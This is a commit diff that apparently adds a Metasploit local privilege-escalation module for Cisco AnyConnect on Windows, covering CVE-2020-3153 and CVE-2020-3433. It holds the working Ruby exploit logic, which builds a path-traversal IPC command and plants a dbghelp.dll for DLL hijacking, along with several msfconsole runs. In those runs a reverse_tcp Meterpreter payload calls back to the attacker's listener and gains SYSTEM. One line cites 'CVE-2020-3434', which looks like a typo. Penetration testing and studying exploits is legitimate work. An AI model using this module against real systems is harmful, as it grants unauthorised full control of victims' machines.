Land #14187, Added CVE-2020-3433 module
Merge branch 'land-14187' into upstream-master
This commit is contained in:
commit
3aeeede4a6
|
@ -0,0 +1,224 @@
|
|||
## Vulnerable Application
|
||||
|
||||
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
|
||||
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
|
||||
to create/overwrite files in arbitrary locations with system level privileges.
|
||||
|
||||
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
|
||||
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
|
||||
to execute code on the affected machine with with system level privileges.
|
||||
|
||||
Both attacks consist in sending a specially crafted IPC request to the TCP
|
||||
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
|
||||
Secure Mobility Agent service. This service will then launch the vulnerable
|
||||
installer component (`vpndownloader`), which copies itself to an arbitrary
|
||||
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
|
||||
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
|
||||
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
|
||||
location `vpndownloader` will be copied to get code execution with system
|
||||
privileges.
|
||||
|
||||
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
|
||||
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
|
||||
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
|
||||
successfully tested against Cisco AnyConnect Secure Mobility Client versions
|
||||
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
|
||||
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
|
||||
|
||||
AnyConnect Secure Mobility Client is not publicly available and only customers
|
||||
with active contracts can download it. For this reason, download links have not
|
||||
been provided.
|
||||
|
||||
## Install the Application
|
||||
|
||||
1. Unzip the AnyConnect package
|
||||
2. Open the extracted folder
|
||||
3. Run `Setup.exe`
|
||||
4. Select `Core & VPN` only (no need to install the full package)
|
||||
5. Click `Install Selected`
|
||||
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
|
||||
7. Accept the EULA (click `Accept`)
|
||||
8. `Installation complete` (click `OK`)... enjoy
|
||||
|
||||
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
|
||||
follow the installation steps with the default options.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a session with non-administrative privileges
|
||||
3. Do: ```use exploit/windows/local/anyconnect_lpe```
|
||||
4. Do: ```set SESSION <SESSION>```
|
||||
5. Do: ```set payload windows/meterpreter/reverse_tcp```
|
||||
6. Do: ```set LHOST <LHOST>```
|
||||
7. Do: ```set LPORT <LPORT>```
|
||||
8. Do: ```check```
|
||||
9. Do: ```run```
|
||||
10. You should get a new session as the SYSTEM user
|
||||
|
||||
## Options
|
||||
### INSTALL_PATH
|
||||
Set Cisco AnyConnect Secure Mobility Client installation path (where
|
||||
`vpndownloader.exe`should be found). It will be automatically detectedif not set.
|
||||
|
||||
### CVE
|
||||
Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
|
||||
|
||||
### ForceExploit
|
||||
|
||||
Set this to `true` to override the `check` result during exploitation.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 version 1909 (x64) with AnyConnect 4.8.3052 - CVE-2020-3433
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
|
||||
lhost => 192.168.1.24
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
|
||||
lport => 4445
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
|
||||
CVE => CVE-2020-3433
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > check
|
||||
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.24:4445
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
|
||||
[*] "-ipc" argument needed
|
||||
[*] Creating directory C:\Users\ATGO\AppData\Local\Temp\16Nkpr
|
||||
[*] Meterpreter Session
|
||||
[*] C:\Users\ATGO\AppData\Local\Temp\16Nkpr created
|
||||
[*] Writing the payload to C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
|
||||
[*] IPC Command: "CAC-nc-install -ipc=76731 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll"
|
||||
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
|
||||
[*] Send the encoded IPC command (size = 288 bytes)
|
||||
[*] Sending stage (176195 bytes) to 192.168.1.20
|
||||
[*] Meterpreter session 3 opened (192.168.1.24:4445 -> 192.168.1.20:44712) at 2020-09-01 14:12:05 +0200
|
||||
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr\dbghelp.dll
|
||||
[+] Deleted C:\Users\ATGO\AppData\Local\Temp\16Nkpr
|
||||
[*] Shutdown the socket
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : W
|
||||
OS : Windows 10 (10.0 Build 18363).
|
||||
Architecture : x64
|
||||
System Language : fr_FR
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
```
|
||||
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3153
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
|
||||
session => 4
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
|
||||
lhost => 192.168.1.24
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
|
||||
lport => 4445
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3153
|
||||
cve => CVE-2020-3153
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > check
|
||||
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.24:4445
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
|
||||
[*] "-ipc" argument needed
|
||||
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
|
||||
[*] IPC Command: "CAC-nc-install -ipc=29278 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\iZnG\iZnG\iZnG\iZnG\../../../../vpndownloader.exe -"
|
||||
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
|
||||
[*] Send the encoded IPC command (size = 270 bytes)
|
||||
[*] Sending stage (176195 bytes) to 192.168.1.20
|
||||
[*] Meterpreter session 5 opened (192.168.1.24:4445 -> 192.168.1.20:45098) at 2020-09-01 14:23:13 +0200
|
||||
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
|
||||
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
|
||||
[*] Shutdown the socket
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : ATGO-PC
|
||||
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
```
|
||||
|
||||
### Windows 7 SP1 with AnyConnect 4.7.4056 - CVE-2020-3433
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set session 4
|
||||
session => 4
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lhost 192.168.1.24
|
||||
lhost => 192.168.1.24
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set lport 4445
|
||||
lport => 4445
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > set cve CVE-2020-3433
|
||||
cve => CVE-2020-3433
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > check
|
||||
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
|
||||
msf5 exploit(windows/local/anyconnect_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.24:4445
|
||||
[*] Try to detect installation path...
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.7.4056.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
|
||||
[*] "-ipc" argument needed
|
||||
[*] Creating directory C:\Users\atgo\AppData\Local\Temp\fPTN4o
|
||||
[*] Meterpreter Session
|
||||
[*] C:\Users\atgo\AppData\Local\Temp\fPTN4o created
|
||||
[*] Writing the payload to C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
|
||||
[*] IPC Command: "CAC-nc-install -ipc=88243 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll"
|
||||
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
|
||||
[*] Send the encoded IPC command (size = 288 bytes)
|
||||
[*] Sending stage (176195 bytes) to 192.168.1.20
|
||||
[*] Meterpreter session 6 opened (192.168.1.24:4445 -> 192.168.1.20:45102) at 2020-09-01 14:24:48 +0200
|
||||
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o\dbghelp.dll
|
||||
[+] Deleted C:\Users\atgo\AppData\Local\Temp\fPTN4o
|
||||
[*] Shutdown the socket
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : ATGO-PC
|
||||
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -1,148 +0,0 @@
|
|||
## Vulnerable Application
|
||||
|
||||
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
|
||||
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
|
||||
to create/overwrite files in arbitrary locations as the SYSTEM user.
|
||||
|
||||
The attack consists of sending a specially crafted IPC request to the TCP port
|
||||
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
|
||||
Mobility Agent service. This service will then launch the vulnerable installer
|
||||
component (`vpndownloader`), which copies itself to an arbitrary location
|
||||
before being executed as the SYSTEM user. Since `vpndownloader` is also
|
||||
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
|
||||
at the same location `vpndownloader` is copied to get code execution as the
|
||||
SYSTEM user.
|
||||
|
||||
This exploit has been successfully tested against Cisco AnyConnect Secure
|
||||
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
|
||||
version 1909 (x64) and Windows 7 SP1 (x86).
|
||||
|
||||
AnyConnect Secure Mobility Client is not publicly available and only customers
|
||||
with active contracts can download it. For this reason, download links have not
|
||||
been provided.
|
||||
|
||||
## Install the Application
|
||||
|
||||
1. Unzip the AnyConnect package
|
||||
2. Open the extracted folder
|
||||
3. Run `Setup.exe`
|
||||
4. Select `Core & VPN` only (no need to install the full package)
|
||||
5. Click `Install Selected`
|
||||
6. Confirm you want to install this specific version of Anyconnect (click `OK`)
|
||||
7. Accept the EULA (click `Accept`)
|
||||
8. `Installation complete` (click `OK`)... enjoy
|
||||
|
||||
Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
|
||||
follow the installation steps with the default options.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a session with non-administrative privileges
|
||||
3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
|
||||
4. Do: ```set SESSION <SESSION>```
|
||||
5. Do: ```set payload windows/meterpreter/reverse_tcp```
|
||||
6. Do: ```set LHOST <LHOST>```
|
||||
7. Do: ```set LPORT <LPORT>```
|
||||
8. Do: ```check```
|
||||
9. Do: ```run```
|
||||
10. You should get a new session as the SYSTEM user
|
||||
|
||||
## Options
|
||||
### ForceExploit
|
||||
|
||||
Set this to `true` to override the `check` result during exploitation.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
|
||||
SESSION => 8
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
|
||||
LHOST => 172.16.60.1
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
|
||||
LPORT => 4445
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
|
||||
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
|
||||
[*] The target appears to be vulnerable.
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.60.1:4445
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
|
||||
[*] "-ipc" argument needed
|
||||
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
|
||||
[*] IPC Command: "CAC-nc-install -ipc=18201 C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
|
||||
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
|
||||
[*] Send the encoded IPC command (size = 270 bytes)
|
||||
[*] Sending stage (176195 bytes) to 172.16.60.202
|
||||
[*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
|
||||
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
|
||||
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
|
||||
[*] Shutdown the socket
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-UUQE0B4
|
||||
OS : Windows 10 (10.0 Build 18363).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
```
|
||||
|
||||
### Windows 7 SP1 (x86) with AnyConnect 4.5.5030
|
||||
|
||||
```
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
|
||||
SESSION => 8
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
|
||||
LHOST => 172.16.60.1
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
|
||||
LPORT => 4445
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
|
||||
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
|
||||
[*] The target appears to be vulnerable.
|
||||
msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.60.1:4445
|
||||
[*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
|
||||
[+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
|
||||
[*] "-ipc" argument not needed
|
||||
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
|
||||
[*] IPC Command: "CAC-nc-install C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe -"
|
||||
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
|
||||
[*] Send the encoded IPC command (size = 247 bytes)
|
||||
[*] Sending stage (176195 bytes) to 172.16.60.134
|
||||
[*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
|
||||
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
|
||||
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
|
||||
[*] Shutdown the socket
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN7-DEV
|
||||
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
```
|
|
@ -16,31 +16,39 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
|
||||
'Name' => 'Cisco AnyConnect Privilege Escalations (CVE-2020-3153 and CVE-2020-3433)',
|
||||
'Description' => %q{
|
||||
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
|
||||
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
|
||||
to create/overwrite files in arbitrary locations with system level privileges.
|
||||
|
||||
The attack consists in sending a specially crafted IPC request to the TCP port
|
||||
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
|
||||
Mobility Agent service. This service will then launch the vulnerable installer
|
||||
component (`vpndownloader`), which copies itself to an arbitrary location
|
||||
before being executed with system privileges. Since `vpndownloader` is also
|
||||
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
|
||||
at the same location `vpndownloader` will be copied to get code execution with
|
||||
system privileges.
|
||||
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
|
||||
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
|
||||
to execute code on the affected machine with with system level privileges.
|
||||
|
||||
This exploit has been successfully tested against Cisco AnyConnect Secure
|
||||
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
|
||||
version 1909 (x64) and Windows 7 SP1 (x86).
|
||||
Both attacks consist in sending a specially crafted IPC request to the TCP
|
||||
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
|
||||
Secure Mobility Agent service. This service will then launch the vulnerable
|
||||
installer component (`vpndownloader`), which copies itself to an arbitrary
|
||||
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
|
||||
executed with system privileges. Since `vpndownloader` is also vulnerable to DLL
|
||||
hijacking, a specially crafted DLL (`dbghelp.dll`) is created at the same
|
||||
location `vpndownloader` will be copied to get code execution with system
|
||||
privileges.
|
||||
|
||||
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
|
||||
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
|
||||
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
|
||||
successfully tested against Cisco AnyConnect Secure Mobility Client versions
|
||||
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
|
||||
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Yorick Koster', # original PoC, analysis
|
||||
'Antoine Goichot (ATGO)', # PoC
|
||||
'Christophe De La Fuente' # msf module
|
||||
'Yorick Koster', # original PoC CVE-2020-3153, analysis
|
||||
'Antoine Goichot (ATGO)', # PoC CVE-2020-3153, original PoC for CVE-2020-3433, update of msf module
|
||||
'Christophe De La Fuente' # msf module for CVE-2020-3153
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
|
@ -58,9 +66,11 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
[
|
||||
['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
|
||||
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
|
||||
['CVE', '2020-3153']
|
||||
['CVE', '2020-3153'],
|
||||
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW'],
|
||||
['CVE', '2020-3433']
|
||||
],
|
||||
'DisclosureDate' => 'Feb 19 2020',
|
||||
'DisclosureDate' => 'Aug 05 2020',
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
|
||||
|
@ -74,7 +84,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
false,
|
||||
'Cisco AnyConnect Secure Mobility Client installation path (where \'vpndownloader.exe\''\
|
||||
' should be found). It will be automatically detected if not set.'
|
||||
])
|
||||
]),
|
||||
OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-3433', ['CVE-2020-3433', 'CVE-2020-3153']])
|
||||
]
|
||||
|
||||
register_advanced_options [
|
||||
|
@ -163,12 +174,19 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
return CheckCode.Unknown('Unable to retrieve vpndownloader.exe file version')
|
||||
end
|
||||
|
||||
patched_version = Gem::Version.new('4.8.02042')
|
||||
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
|
||||
|
||||
patched_version_cve_2020_3153 = Gem::Version.new('4.8.02042')
|
||||
patched_version_cve_2020_3433 = Gem::Version.new('4.9.00086')
|
||||
@ac_version = Gem::Version.new(version.join('.'))
|
||||
if @ac_version < patched_version
|
||||
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version}.")
|
||||
if @ac_version < patched_version_cve_2020_3153
|
||||
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3153} (CVE-2020-3153 & CVE-2020-3433).")
|
||||
elsif (@ac_version < patched_version_cve_2020_3433) && !cve_2020_3153
|
||||
return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version_cve_2020_3433} (CVE-2020-3433).")
|
||||
elsif (@ac_version < patched_version_cve_2020_3433) && cve_2020_3153
|
||||
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3153} (However CVE-2020-3433 can be used).")
|
||||
else
|
||||
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version}.")
|
||||
return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version_cve_2020_3433}.")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -198,8 +216,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status('"-ipc" argument not needed')
|
||||
end
|
||||
|
||||
program_data_path = get_env('ProgramData')
|
||||
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
|
||||
cve_2020_3153 = (datastore['CVE'] == 'CVE-2020-3153')
|
||||
if cve_2020_3153
|
||||
program_data_path = get_env('ProgramData')
|
||||
dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
|
||||
else
|
||||
temp_path = get_env('TEMP')
|
||||
junk = Rex::Text.rand_text_alphanumeric(6)
|
||||
temp_path << "\\#{junk}"
|
||||
mkdir(temp_path)
|
||||
dbghelp_path = "#{temp_path}\\dbghelp.dll"
|
||||
end
|
||||
|
||||
print_status("Writing the payload to #{dbghelp_path}")
|
||||
|
||||
begin
|
||||
|
@ -210,12 +238,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with(Failure::NotFound, e.message)
|
||||
end
|
||||
|
||||
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
|
||||
# normal process will copy the file to
|
||||
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
|
||||
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
|
||||
junk = Rex::Text.rand_text_alphanumeric(4)
|
||||
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
|
||||
if cve_2020_3153
|
||||
# vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
|
||||
# normal process will copy the file to
|
||||
# "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
|
||||
register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
|
||||
junk = Rex::Text.rand_text_alphanumeric(4)
|
||||
cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
|
||||
else
|
||||
cac_cmd << "\t#{@installation_path}\\vpndownloader.exe\t#{dbghelp_path}\""
|
||||
end
|
||||
|
||||
vprint_status("IPC Command: #{cac_cmd}")
|
||||
|
||||
cipc_msg = CIPCMessage.new
|
Loading…
Reference in New Issue